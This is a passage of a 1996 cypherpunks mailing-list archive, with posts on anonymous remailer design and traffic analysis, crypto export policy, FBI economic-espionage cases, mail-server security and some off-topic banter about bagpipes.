> Why you were expecting people to be posting paranoid rantings if you did
> not even know who Dr. John Grubor, undercover police agent, was?

Gee, given the anonymous paranoid rants that greeted nym.alias.net and the 
SAFE conference, I can't imagine...

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 29 Jun 1996 16:05:55 +0800
To: cypherpunks@toad.com
Subject: www hacking?
Message-ID: <960629011631_145401493@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I havent seen much in lines of this being a problem yet..although I was
reading through practical unix security (newest edition) and it made mention
of the danger of hacking WWW. Forgive my ignorance on this.. but what dangers
are there? I could see someone attacking the main server and do damage in
that sense..but Im a little outdated in this as far as what is attacked. The
only thing Ive ever had to worry about was unix, now theres oh-so much more.
If someone could tell me the dangers of someone attacking someones
site..etc..on the WWW, I would much appreciate it!
Thanks 
Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 29 Jun 1996 18:06:32 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <Alp9gs600YUyRVfsNl@andrew.cmu.edu>
Message-ID: <Pine.LNX.3.93.960629013851.429A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jun 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 27-Jun-96 Re: crypto and bagpipes
> [NO.. by "Perry E. Metzger"@pierm 
> > No one who has heard sustained bagpipe playing can deny the fact that
> > bagpipes are indeed an instrument of war, with no legitimate place in
> > peaceful everyday society.
> 
> Hmm... Carnegie Mellon University is the only school in the country with
> a bagpipe major, you know. You haven't lived until you've heard a
> screeching 'pipe at 3 am in front of Hunt Library.

	And after, you _aren't_ alive.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ryans@worldchat.com
Date: Sat, 29 Jun 1996 16:20:20 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <31D4C3DD.29A6@worldchat.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 29 Jun 1996 19:30:29 +0800
To: cypherpunks@toad.com
Subject: Re: RFD: Developing Nations and crypto (based on excertp from Edupag
Message-ID: <199606290859.BAA25535@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 AM 6/26/96 -0700, Timothy C. May wrote:
> Sadly, most developing countries (Third World, LDCs, whatever) have
> repressive governments of various stripes...few are libertarian. Several
> have embraced computer technology, but primarily as an instrument of social
> control.

This is true, but basically back to front.  Certain common forms of repressive
economic policy cause poverty.  From time to time political convulsions change
this policy for a long period.  If the period is several decades, development
follows.

In the past, popular support for these repressive policies was vast and 
overwhelming, and once in place they could only be changed by fairly 
murderous dictatorships, for example South Korea and Chile.

Popular support for these policies is still substantial, but has steadily 
diminished.

In my opinion this diminishing support is largely the result of 
improved international communications.  When people in poor countries 
discover that their social order is radically different from that in 
similar rich countries, they are apt to vote for institutions similar 
to those in the rich country -- the JR Ewing affect.

In short, the third world it has become considerably easier to create
liberty without the need to massacre real, suspected, and imaginary
communists.



>Singapore is an example of a country that jumped from former colonial
>status, surrounded by relatively poor (GNP) countries, to the "Information
>Age." And what is the result? What our own Sandy Sandfort dubbed
>"Disneyland with a Death Penalty." No spitting, no cursing, no long hair,
>no "Wall Street Journal," no pornography, no Internet free access, no
>dissension. And smartcards track the movements of all Citizen-Units. Not an
>encouraging example.
>
>As for the comment that "they aren't bogged down in older ways of doing
>business, communicating, etc." Well, some of these "older ways" include:
>
>- concepts about the ownership of property and transfers of title
>
>- contracts, and the ability to make and enforce them
>
>- understanding of the Uniform Commercial Code (the descendent of the "Law
>Merchant" which Western societies have embraced for centuries)
>
>- a stable middle class, solid educational facilities, and a tradition of
>business and technical achievement
>
>(These are all things which are missing in many Third World countries, for
>whatever reasons. Even in many Second World countries, such as the former
>U.S.S.R., and these lacks are making the development of modern economic
>systems problematic.)
>
>Certainly some small nations--perhaps island nations--can essentially jump
>directly to an "information based economy." The Cayman Islands and several
>other examples come to mind.
>
>I find it harder to believe that a _large_ nation is likely to make such a
>transition.
>
>--Tim May
>
>Boycott "Big Brother Inside" software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@ionet.net>
Date: Sat, 29 Jun 1996 19:41:48 +0800
To: ichudov@algebra.com
Subject: Re: anonymous mailing lists
In-Reply-To: <199606290404.XAA32220@manifold.algebra.com>
Message-ID: <Pine.SOL.3.91.960629040641.12090A-100000@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 28 Jun 1996 ichudov@algebra.com wrote:

> Then users of alpha.c2.org will have to install mail filters that
> automatically delete all incoming mail not intended to be read by them
> (they can't read such messages anyway).

How exactly would this be done? Since messages from alpha.c2.org
are conventionally encrypted, they don't contain key id's. 

Wouldn't that require every recipient to store his/her passphrase
and call pgp for every message to see if it could be decrypted? This in
and of itself would be a more serious security breach, not to mention an 
_enormous_ drain on site resources. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@ionet.net>
Date: Sat, 29 Jun 1996 19:25:30 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe
In-Reply-To: <31D4C3DD.29A6@worldchat.com>
Message-ID: <Pine.SOL.3.91.960629041429.12090B-100000@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 29 Jun 1996 ryans@worldchat.com wrote:

> unsuscribe
> 

Apparently noone in this country knows how to: 

1. Read the help file sent out automatically upon
   subscription.

2. Spell "unsubscribe."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 29 Jun 1996 13:55:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606290306.FAA23041@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


declan@well.com (Declan McCullagh) spake thus and so:

>WASHINGTON, DC -- With no fanfare and no hype, the Justice Department
>yesterday faxed a 39-word statement to Senator Exon saying they will
>appeal their loss in the Philadelphia case.
>
>The consolidated lawsuits of ACLU v. Reno and ALA v. DoJ resulted in a
>victory for the plaintiffs earlier this month after a three-judge panel
>granted a preliminary injunction preventing the DoJ from enforcing the
>Communications Decency Act.

Sounds like a case of "political testicles in a vise." This smells like
an election-year maneuver so the Clinton administration can maintain its
faade. (After all, who wants to be called "soft on the protection of
children"?) By the time it's finally settled, the Congresscritters will
have been re-elected and can go merrily back to perverting the
Constitution.

So how'd we wind up having to choose between *these* two yahoos for 
President? :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 29 Jun 1996 13:47:44 +0800
To: cypherpunks@toad.com
Subject: John Grubor and you
Message-ID: <199606290307.FAA23142@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucifer Remailer Operator wrote:

>Just for the record, I am NOT John Grubor and had never even heard of him
>before I did an Altavista search on his name earlier today.  The concept that
>some net.loon like Grubor would get another account with DHP to run an
>anonymous remailer for whatever reason is LAUGHABLE.  From what I have read,
>Grubor spams newsgroups quite often, something I have not done nor plan on
>doing.  I was expecting people to be posting paranoid rantings about how I
>am obviously a SPOOK...

Why you were expecting people to be posting paranoid rantings if you did
not even know who Dr. John Grubor, undercover police agent, was?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 29 Jun 1996 22:26:53 +0800
To: cypherpunks@toad.com
Subject: Re: mocking paranoia
Message-ID: <2.2.32.19960629122315.0068dd0c@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:58 AM 6/29/96 nelson@crynwr.com wrote:
>Earlier, someone mocked someone else for being paranoid.  Sorry, but
>this is a mistake.  By definition, you have a non-empty threat model
>when you set out to encrypt; therefore you must be paranoid to use
>encryption.  Or else they really *could* be out to get you, but
>sometimes it's not possible to tell, and you have to assume that they
>are.

heh... "just because you're paranoid doesn't mean they're not after you."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 29 Jun 1996 21:10:09 +0800
To: Rich <rich@netbox.com>
Subject: Re: PC-ness of nym.alias.net
In-Reply-To: <199606290304.DAA15488@netbox.com>
Message-ID: <Pine.NEB.3.93.960629053420.7046A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 28 Jun 1996, Rich wrote:

> According to the root DNS servers, which as we know are controlled by a ZOG
> defense contractor, alias.net is an alias for alpha.jpunix.com, and
> anon.lcs.mit.edu is indeed the same as nym.alias.net. alias2-dom is said to
> get name service from Sameer and company, but that could be a trap. 

	Not totally correct. I used to run the alias.net domain but I
handed it over to Sameer at one time because I was unable to administer it
due to some things going on at work. So the correct answer is that Sameer
now owns and operates alias.net. 

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdUHQ1OTpEThrthvAQFtKAP9Hehb3i1RaVOs12nwSFAor3YM+GiYYIad
wpCvgwKWv+VPgMrC+ogga2apkNngd6ztC7J7Zk99tDq0v78yJrq1N7x0O/xXREcA
FPxCqdOjPxolIEIG7Xb6Oqvfby/cDwP2hzX9tgWz01s51xToLyGG/j7PSwbEgMRA
oe5t0wvgOqE=
=3/Ys
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 29 Jun 1996 16:38:08 +0800
To: cypherpunks@toad.com
Subject: mocking paranoia
Message-ID: <19960629055807.31357.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Earlier, someone mocked someone else for being paranoid.  Sorry, but
this is a mistake.  By definition, you have a non-empty threat model
when you set out to encrypt; therefore you must be paranoid to use
encryption.  Or else they really *could* be out to get you, but
sometimes it's not possible to tell, and you have to assume that they
are.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 29 Jun 1996 16:41:52 +0800
To: cypherpunks@toad.com
Subject: Open letter to the NSA
Message-ID: <19960629061130.31403.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


You screwed up, guys.  If, instead of restricting the export of strong
crypto systems, you had instead encouraged it, you would have
prevented the development of foreign crypto expertise.  Look at South
Africa: we banned them armaments, so they created their own arms
industry.  Now they're a serious arms exporter.  You won in the
short-term and lost in the long-term.

Where is the wisdom needed to admit your mistake?  Missing, I'd say.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sun, 30 Jun 1996 01:53:20 +0800
To: cypherpunks@toad.com
Subject: Open Gates?
Message-ID: <102_9606290819@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond via netmail, as I have only limited access to the list.]

Does anyone have a _current_ list of open mail-to-news gates?

As far as I can tell, the only one is:

        group.name@pubnews.demon.co.uk

Thanks for any help.
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sun, 30 Jun 1996 02:56:47 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous mailing lists
In-Reply-To: <01I6GF62YWG291VYF3@delphi.com>
Message-ID: <4r3k8g$8h@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199606290404.XAA32220@manifold.algebra.com>,
Igor Chudov @ home <ichudov@algebra.com> wrote:
>How about this attack: suppose I want to find out who hides behind
>an alias MightyPig@alpha.c2.org and I have the ability to monitor
>all internet traffic. Then I simply start mailbombing that address
>and see whose account gets unusually high traffic volume.
>
>A nice, albeit quite expensive, way of pretection from traffic analysis
>is to create a mailing list (or a newsgroup) and forward all messages to
>all users of that mailing list or newsgroup. Of course, since messages
>are encrypted, only the recipients will be able to decrypt them.
>
>This way the list of suspects is all subscribers of that list or
>newsgroup and there is no way to discriminate them.
>
>Instead of having messages to be sent to all recipients all the time,
>alpha.c2.org may be programmed so that it sends out every message not to
>only one recipient X, but to X and 20 other randomly selected people.
>
>It apparently makes traffic analysis much harder.
>
>Then users of alpha.c2.org will have to install mail filters that
>automatically delete all incoming mail not intended to be read by them
>(they can't read such messages anyway).
>
>        - Igor.

[I'm copying this to remailer-operators.]

Yesterday, Dave and I discussed at length a design for a new remailer network.
It was motivated by the fact that, when I installed mixmaster, it mentioned
Diffie-Helman and direct socket connections as a "future expansion"
thing.  Well, IMHO, that time has come.  I wanted to hack mixmaster to
accept ecash postage for the last hop, anyway, so I may as well put in
the direct connection bits as well.

I'll post more about this when we've discussed it more (and with Lance),
and when I'm on a faster link to the net.  Basically, the idea is that every
remailer gets a copy of every encrypted message, using a randomized fill
algorithm, and D-H encrypted links.  If you're a remailer in this network,
and you get a message:

If you've seen this message before, drop it (this step needs more thought).
If you can decrypt the message, do so, and handle the decrypted copy (but
continue with the following steps with the original message anyway).
If you have a message waiting to be inserted into the remailer network,
drop the incoming message and take that message instead.
Take whatever message you have now, and queue it to be sent to 5 random
remailers.  Every so often, fill your queue to a constant size with dummy
messages, and send some (possibly smaller, randomly chosen) constant
number of them on their way.
All messages should, of course, be packetized to the same size, a la mixmaster.

The result of this is that, if you are a part of this network, it should
be impossible for anyone to tell when you receive a message, as opposed
to anyone else in the network (think alt.anonymous.messages, but where
the links are D-H encrypted, and you have a news feed to your own
machine, and the message sizes are all the same, and so on...).  This is
perfect for making nyms.

Sender anonymity is achieved by chaining.  If you are part of the network,
you can always claim that a message you sent was just one you received from
somewhere else (you used D-H to get the messages, so you can't identify
from where, though).

So if you're part of the network, it would seem you are indistinguishable
from anyone else on the network.  Here is where the tradeoff occurs.
How big should the network be?  If it's too small, the above anonymity
doesn't gain you much.  If it's too big, you may not be able to handle
all of the remailer traffic.

Also, what are the issues for people who aren't on the network?  It will
be very hard to prevent people from noticing that they're sending a
message to the network, or receiving one from it, so it seems the best we can
do is to avoid letting someone be able to link incoming messages to outgoing
ones.  A way to help this is to have a (smaller) number of nodes be the
only ones which send mail _out_ of the network.  One idea which I'd like to
try is having that last remailer charge postage in order to send mail out.
After all, he is the one who will take the "heat" for the anon message,
probably.  By concentrating the outgoing messages, it should be easier
to do the latency and reordering tricks.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdVUL0ZRiTErSPb1AQH3mAQAhf0Lgh2cpahbF8JrB+hhD8ZP3oV3v9bA
UsfRFEV+vcQtCopvwEsXGz6FvuyrxvYzxWE+74iPBlY204eeiTFZ0n1zq8qGRIuw
kUgdM0jgNX5v5nmv+EaUeeCkuRQ5JEqIevlaD9iaK3iYO2mAVg8HFxzdmV0kLPq1
hLehErR+GX4=
=7JBM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 30 Jun 1996 03:06:32 +0800
To: janimmo@ionet.net
Subject: Re: anonymous mailing lists
Message-ID: <199606291634.JAA28291@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jeffrey A Nimmo <janimmo@ionet.net>
> On Fri, 28 Jun 1996 ichudov@algebra.com wrote:
> > Then users of alpha.c2.org will have to install mail filters that
> > automatically delete all incoming mail not intended to be read by them
> > (they can't read such messages anyway).
> 
> How exactly would this be done? Since messages from alpha.c2.org
> are conventionally encrypted, they don't contain key id's. 
> 
> Wouldn't that require every recipient to store his/her passphrase
> and call pgp for every message to see if it could be decrypted? This in
> and of itself would be a more serious security breach, not to mention an 
> _enormous_ drain on site resources. 

Since the PGP is run on private computers, and only at mail-reading time,
there should be no problem entering the conventional encryption
passphrase and checking to see whether the messages decrypt.  Actually
PGP puts a pattern at the beginning of the encrypted portion, so
successful decryption can be checked very quickly, without much of a
computational load.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 30 Jun 1996 04:13:04 +0800
To: ichudov@algebra.com
Subject: Re: anonymous mailing lists
Message-ID: <199606291637.JAA28348@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ichudov@algebra.com (Igor Chudov @ home)
> A nice, albeit quite expensive, way of pretection from traffic analysis
> is to create a mailing list (or a newsgroup) and forward all messages to
> all users of that mailing list or newsgroup. Of course, since messages
> are encrypted, only the recipients will be able to decrypt them.

This was discussed here several years ago, under the name "anonymous
message pools".  Myron Cuperman, the operator of the extropia remailer
implemented one, although I don't know if it is still running (I
haven't gotten any mail from it for years).  It was basically just a
mailing list specifically for this purpose, that you would use as your
anonymous return address.  Of course a problem is that there may not be
enough people signed up to provide much privacy protection.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 30 Jun 1996 05:03:31 +0800
To: cypherpunks@toad.com
Subject: Re:  anonymous mailing lists
Message-ID: <199606291640.JAA28469@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai did some nice statistical analysis of this type of attack
sometime a year or two ago.  Even with countermeasures such as you
suggest, if they are not perfect, so some information leaks correlating
incoming and outgoing messages, Wei showed that it was possible to
deduce the owners of the nyms surprisingly quickly.

The countermeasures do work - if you get and send exactly 50 pieces of
4K byte email every day, no matter what, then correlations don't exist
- but they are expensive to do perfectly.  For now we have much worse
weaknesses; none of the current return-address systems are really safe,
other than posting encrypted mail to newsgroups (and even that may be a
problem if they suspect who you are and are monitoring your computer
link to see if you download certain messages).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 30 Jun 1996 04:20:15 +0800
To: Bill Stewart <jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: Alternic.net (was domain zapping)
Message-ID: <199606291758.KAA19598@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:03 AM 6/28/96 -0700, Bill Stewart wrote:
> If you don't do it carefully,
> you'll end up needing a bunch of Above-Top-Level nameservers that
> serve the names of the tens of thousands of top-level domains.

Five thousand top level domain names is quite manageable, no big problem 
provided that their servers are reasonably stable -- and if the unstable 
ones do not work well, big deal.

A hundred thousand would be a problem.

Assume a top level domain typically lasts forever, and a top level server 
typically lasts ten years.  Assume two new top level domain names appear 
each day, and that it typically takes a several of months of reliable service
to be added to the most generally accepted lists.  This does not seem to
constitute an intolerable burden to most domain name server administrators.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 30 Jun 1996 06:13:50 +0800
To: "Declan B. McCullagh" <perry@piermont.com
Subject: Re: crypto and bagpipes [NOISE]
Message-ID: <2.2.32.19960629184928.00ad4d90@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 PM 6/28/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 27-Jun-96 Re: crypto and bagpipes
>[NO.. by "Perry E. Metzger"@pierm 
>> No one who has heard sustained bagpipe playing can deny the fact that
>> bagpipes are indeed an instrument of war, with no legitimate place in
>> peaceful everyday society.
>
>Hmm... Carnegie Mellon University is the only school in the country with
>a bagpipe major, you know. You haven't lived until you've heard a
>screeching 'pipe at 3 am in front of Hunt Library.

I guess this explains the pro-censorship outlook of the students and staff
there.  Maybe someone should be investigating the evil effects of bagpipes
on the mind.  (The Freudian implications of bagpipe playing alone should get
someone there to do something about it...)


---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 29 Jun 1996 22:57:54 +0800
To: technology@jefferson.village.virginia.edu
Subject: The End of Science
Message-ID: <199606291214.MAA23695@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Natalie Angier, the sharp-witted science reporter for The 
   New York Times, reviews "The End of Science," by John 
   Horgan, a senior writer at Scientific American, in the June 
   30 NYT Book Review. She writes: 
 
      In this intellectually bracing, sweepingly reported, 
      often brilliant and sometimes bullying book, John Horgan 
      makes the powerful case that the best and most exciting 
      scientific discoveries are behind us. He argues that 
      many scientists today, particularly those he interviewed 
      for this book, are "gripped by a profound unease." Part 
      of that malaise results from all the sociopolitical 
      irritants we've heard about: the dwindling financial 
      resources, the vicious competition, the strident 
      antipathy of animal rights activists, religious 
      fundamentalists, technophobes and the like. 
 
      But a far more important source of despair, Mr. Horgan 
      insists, is that scientists are beginning to sense that 
      "the great era of scientific discovery is over." The big 
      truths, the primordial truths, the pure truths about 
      "the universe and our place in it" have already been 
      mapped out. Science has been so spectacularly successful 
      at describing the principal features of the universe, on 
      a scale from quarks to the superstructure of galaxies, 
      that the entire enterprise may well end up the 
      paradoxical victim of its own prosperity. "Further 
      research may yield no more great revelations or 
      revolutions," he writes, "but only incremental, 
      diminishing returns." 
 
   While Angier does not agree with his thesis that the major 
   problems of science have been solved, she commends his 
   incisive critique of scientists who cannot give up the 
   dream of omniscience, many of whom he has interviewed for 
   the book -- Stephen Jay Gould, Roger Penrose, Steven 
   Weinberg, Daniel Dennett, Stuart Kauffman, Marvin Minsky, 
   John Wheeler, Frank Tipler and others. 
 
   She summarizes Horgan's view of detumescent science: 
 
      Where does that leave contemporary scientists? They can 
      either pursue small, manageable and vaguely boring 
      science (sequencing the complete complement of human DNA 
      may fall into this category), or they can turn to what 
      Mr. Horgan calls "ironic science." Such science is 
      "speculative, postempirical," resembling literary 
      criticism "in that it offers points of view, opinions, 
      which are, at best, interesting." Ironic science is 
      provocative, he says, but it fails to converge on the 
      truth. " It cannot achieve empirically verifiable 
      surprises that force scientists to make substantial 
      revisions in their basic description of reality," he 
      writes. 
 
   ---------- 
 
   For those without access to NYT, the full review is 
   available at: 
 
      http://pwp.usa.pipeline.com/~jya/theend.txt   (11 kb) 
 
   Or, we will E-mail a copy. Send a blank message to 
   <jya@pipeline.com> with the subject THE_end 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 30 Jun 1996 07:14:52 +0800
To: cypherpunks@toad.com
Subject: fbi botches intel "ecspionage" case
Message-ID: <199606291925.MAA12512@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



"economic espionage" (ecspionage?) is in full swing as being 
promoted as the new bogeyman to justify spending billions of
dollars to our intelligence agencies, both military and
the FBI.

we already have a very good example where this has
backfired. I was watching Nightline on Tues night or
so in which there was info about how the FBI helped
get an informant into Intel in a *very* sensitive
position, where he was able to film the pentium chip
plans. he said he sold them, as I recall,
to iraq, syria, china, etc.

at the end of the show, the reporter stated that
the FBI was seeking stronger laws against theft
of "intellectual property" in congress that might
solve the problem. there was much lamentation over the
fact the criminal in question only got about 33 months
of prison time or something.

the FBI emerged with great egg on their face. I would
say if anyone wants to ridicule them for getting into
covering "ecspionage" cases, this is a prime candidate
case. is this what they are aiming for? heh, heh.

==

somehow we have missed a good public debate about 
ecspionage in the country. there were a few NYT 
editorials, but it is clearly being used as a very
major aspect of promoting the new post-cold-war spy
and intelligence strategy without almost any notice
by major analyists.

I was thinking about all the objections I had to the
FBI ecspionage treatment that were never raised on the
program:


1. there was an implicit assumption that merely having
the plans to the chip would allow other countries to somehow
slaughter us in economic competition. but INTEL has spent
billions of dollars on physical infrastructure without which
the plans are virtually useless. it would take other countries
years to get the kind of equipment necessary to produce the
pentium, by which it might actually be yesterday's technology
that no one cares about any more.

2. we have a tradition of separation of church and state in
this country, and also separation of the public government
and private industry. suddenly we have the FBI saying they
want to infiltrate companies to deal with economic espionage.
well, these companies have their own policy, and what do
they gain by having a government agency working inside them?
in the above case I note, it led to exactly the *opposite*
of what was intended: the theft of *highly*sensitive* plans
by an FBI mole.

3. hence, one wonders if the FBI could do a better job of
combating ecspionage than companies are already doing, or
if they are just going to botch it as has already been 
spectacularly proven in this case.

4. we could have companies that are run like the NSA to prevent
"theft of information" (in quotes because I wonder if this will
be considered a crime in future decades, just as heresy and
blasphemy were once considered crimes a long time ago but no
longer are today).  however, we have the old "openess vs.
security" catch-22. we can't have technological development
without some degree of openess.

5. what is "intellectual property"? I think a very good case
can be made that there isn't really any such thing, that
the term itself may be thought in the future as something
like an oxymoron. there is a big red flag going up here:
why do we need all kinds of laws to combat this? is it
really a problem? can anyone actually point to a very sinister
situation in which massive amounts of cash were lost by a 
company due to ecspionage? as the steve jackson games 
incident proved, companies are liable to vastly exaggerate
their losses to the point of fantasy. they have a tendency
to think that "their information" is worth hundreds of thousands
of dollars when it may actually be freely legally obtainable.

if someone else can give more info on this case (apparently
a book is coming out about it or something) including the
guy's name, I'd appreciate it, I didn't take any notes so
this is a bit fuzzy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 30 Jun 1996 03:06:38 +0800
To: perry@piermont.com
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <199606280352.XAA06868@jekyll.piermont.com>
Message-ID: <199606291737.MAA24643@homeport.org>
MIME-Version: 1.0
Content-Type: text


Damnit, Perry, the fact that you don't like them doesn't mean we
should outlaw them!  :)

Adam

Perry E. Metzger wrote:
| vinnie moscaritolo writes:
| > >>>A Missive From: David Kovar (kovar@nda.com)
| [...]
| > >>>Mr Brooks, the piper, has denied the charge, citing a case in 1746,
| > >>>where bagpipes were declared to be instruments of war, not musical
| > >>>instruments, and a subsequent Act of Parliament which specifically
| > >>>stated that they were weapons. He claims he wasn't playing a musical
| > >>>instrument, but practising with a weapon!
| > >>>
| > >>>The imagination boggles if his claim is successful!
| 
| No one who has heard sustained bagpipe playing can deny the fact that
| bagpipes are indeed an instrument of war, with no legitimate place in
| peaceful everyday society.
| 
| Perry
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 30 Jun 1996 03:02:54 +0800
To: wywong2@cs.cuhk.hk (Leo WONG Wing-yan)
Subject: Re: MS-Mail Security
In-Reply-To: <Pine.SOL.3.91.960627231233.11957A-100000@sol25.cs.cuhk.hk>
Message-ID: <199606291744.MAA24676@homeport.org>
MIME-Version: 1.0
Content-Type: text


Leo WONG Wing-yan wrote:

|     I would like to gather informations of whether the MS-Mail server is 
| secure or not, is anyone heard of somebody, say, disguise as other user 
| or read other user e-mail?

	Its good idea to think of mail security as an end to end
thing; you encrypt the mail for your recipient(s).  They decrypt it.
There are (decent) proposals afoot to encrypt mail server to server,
which is fine, it doesn't sacrifice security, and makes accidental
mail reading less likely.

	However, I know of two mail servers that I might trust, and
both of them (qmail and smap) come as source code.  I wouldn't trust
any MS product with security functions; what happens when it breaks?
SMB was broken for 3 months before it was fixed.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Myers <blackavr@aa.net>
Date: Sun, 30 Jun 1996 07:18:03 +0800
To: cypherpunks@toad.com
Subject: Re: crypto and bagpipes [NOISE]
Message-ID: <2.2.32.19960629200120.006b2158@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 PM 6/29/96 -0500, Adam Shostack wrote:
